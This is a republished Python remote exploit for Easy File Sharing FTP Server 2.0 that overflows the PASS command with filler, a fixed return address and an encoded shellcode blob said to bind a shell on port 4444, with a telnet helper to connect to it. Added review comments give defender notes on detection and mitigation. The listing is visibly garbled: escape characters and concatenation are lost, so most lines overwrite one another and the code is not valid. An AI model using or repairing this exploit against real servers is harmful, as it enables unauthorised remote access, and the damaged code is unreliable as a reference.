Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
摘要:#!/usr/bin/python#RemoteexploitforEasyFileSharingFTPserverV2.0.Thevuln...

#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas :-)

import os

import sys

import time

import struct

import socket

# Opaque encoded payload blob. The file header says its effect is to bind a
# command shell on TCP port 4444 of the FTP host; nothing in this listing
# decodes it, so that description rests on the author's header comment only.
# NOTE(review): apart from the first few bytes, the values sit in the
# printable-ASCII range, which suggests an alphanumeric encoder. Byte
# signatures on such a blob are therefore brittle; detection is better keyed
# on behaviour (see the notes on ExploitFTP and on port 4444).
# NOTE(review): as rendered on this page the literals carry extraction
# damage, so the blob is not the byte string the author published.
shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"

shellcode = "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"

shellcode = "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"

shellcode = "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"

shellcode = "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"

shellcode = "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"

shellcode = "x4ex56x46x42x46x42x4bx48x45x34x4ex33x4bx38x4ex37"

shellcode = "x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"

shellcode = "x4fx45x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38"

shellcode = "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"

shellcode = "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"

shellcode = "x46x4fx4bx43x46x35x46x32x4ax52x45x47x45x4ex4bx58"

shellcode = "x4fx45x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx34"

shellcode = "x4bx38x4fx45x4ex51x41x50x4bx4ex43x30x4ex42x4bx48"

shellcode = "x49x38x4ex46x46x52x4ex31x41x36x43x4cx41x43x4bx4d"

shellcode = "x46x36x4bx48x43x34x42x53x4bx48x42x44x4ex50x4bx58"

shellcode = "x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x55x4ax56"

shellcode = "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"

shellcode = "x43x35x48x36x4ax36x43x43x44x43x4ax36x47x37x43x57"

shellcode = "x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"

shellcode = "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx45x49x48x45x4e"

shellcode = "x48x56x41x48x4dx4ex4ax30x44x30x45x55x4cx56x44x30"

shellcode = "x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x55"

shellcode = "x4fx4fx48x4dx43x45x43x45x43x45x43x35x43x35x43x44"

shellcode = "x43x55x43x44x43x35x4fx4fx42x4dx48x46x4ax56x41x31"

shellcode = "x4ex45x48x36x43x55x49x58x41x4ex45x39x4ax56x46x4a"

shellcode = "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"

shellcode = "x41x35x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"

shellcode = "x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"

shellcode = "x4ax46x45x4ex49x44x48x58x49x54x47x45x4fx4fx48x4d"

shellcode = "x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax56"

shellcode = "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55"

shellcode = "x4fx4fx42x4dx48x56x4cx46x46x46x48x46x4ax36x43x46"

shellcode = "x4dx46x49x58x45x4ex4cx46x42x35x49x35x49x32x4ex4c"

shellcode = "x49x38x47x4ex4cx36x46x34x49x38x44x4ex41x53x42x4c"

shellcode = "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x44x4ex32"

shellcode = "x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"

shellcode = "x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"

shellcode = "x48x4dx4bx35x47x45x44x55x41x45x41x45x41x55x4cx36"

shellcode = "x41x30x41x35x41x45x45x45x41x45x4fx4fx42x4dx4ax46"

shellcode = "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx46"

shellcode = "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"

shellcode = "x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d"

shellcode = "x4ax56x4fx4ex50x4cx42x4ex42x36x43x55x4fx4fx48x4d"

shellcode = "x4fx4fx42x4dx5a"

# Helper that launches the local telnet client against TCP port 4444 on
# `target`, the port the file header says the payload listens on.
# It is defined here but never called from the __main__ block shown below.
# Defender view: an inbound connection to TCP 4444 on a host whose only
# published service is FTP is a strong compromise indicator. A default-deny
# inbound host firewall prevents the listener from being reachable at all.
def ConnectRemoteShell(target):

connect = "/usr/bin/telnet " target " 4444"

# NOTE(review): `target` is taken from the command line and reaches
# os.system(), i.e. a shell, without any validation.
os.system(connect)

# Drives one FTP control-channel session against `target` on TCP port 21:
# read the banner, send USER anonymous, then send a PASS command whose
# argument carries the oversized payload. Each server reply is printed.
# Written in Python 2 syntax (print statements).
# NOTE(review): the listing as rendered on this page has extraction damage
# and is not valid Python; this description follows the author's comments.
#
# Defender notes drawn from what the listing shows:
#  - The oversized data is sent in PASS right after an anonymous USER, so no
#    valid account is involved; presumably the overflow is reached while the
#    server parses the password. Confirm against the vendor advisory.
#  - The PASS argument is several kilobytes long (2553 filler bytes plus
#    padding and the payload). FTP passwords of that size are anomalous, so
#    a length threshold on PASS at an IDS or FTP-aware proxy flags this
#    traffic without relying on payload signatures.
#  - The return address is a fixed location inside a system DLL of one
#    specific OS build, and the author marks the XP SP2 alternative as
#    unreliable. Address-space randomisation and non-executable stacks on
#    later platforms defeat a fixed address of this kind.
#  - The header names Easy File Sharing FTP Server 2.0 as affected. No fixed
#    release is named on this page, so check the vendor for a patched
#    version or retire the service.
def ExploitFTP(target):

sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tsock.connect(sockAddr)

# Server banner. No timeout is set on the socket, so recv() blocks
# until the server answers.
response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

payload = 'A' * 2553

# NOP's pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = 'x90x90x90x90x90x90x90x90xebx0f'

# Address of 'call ebx' from kernel32.dll SP4

payload = struct.pack('<L', 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack('<L', 0x71AB1269)

payload = 'x90' * 83

payload = shellcode

user = 'USER anonymousrn'

tsock.send(user)

response = tsock.recv(1024)

print response

passwd = 'PASS x2c' payload 'rn'

tsock.send(passwd)

# The socket is never closed in this function. A control connection that
# goes silent after an oversized PASS is what server-side logs would show
# if the service crashed or was hijacked.
response = tsock.recv(1024)

print response

# Script entry point: takes the target host as the only command-line
# argument, prints a usage line and exits with -1 when it is missing, then
# calls ExploitFTP. ConnectRemoteShell is not called here.
if __name__ == '__main__':

try:

target = sys.argv[1]

except IndexError:

print 'Usage: %s <target>' % sys.argv[0]

sys.exit(-1)

# NOTE(review): the trailing '//http://www.leftworld.net' on the next line
# looks like a watermark appended by a republishing site rather than part
# of the author's script. It is not valid Python.
ExploitFTP(target)//http://www.leftworld.net
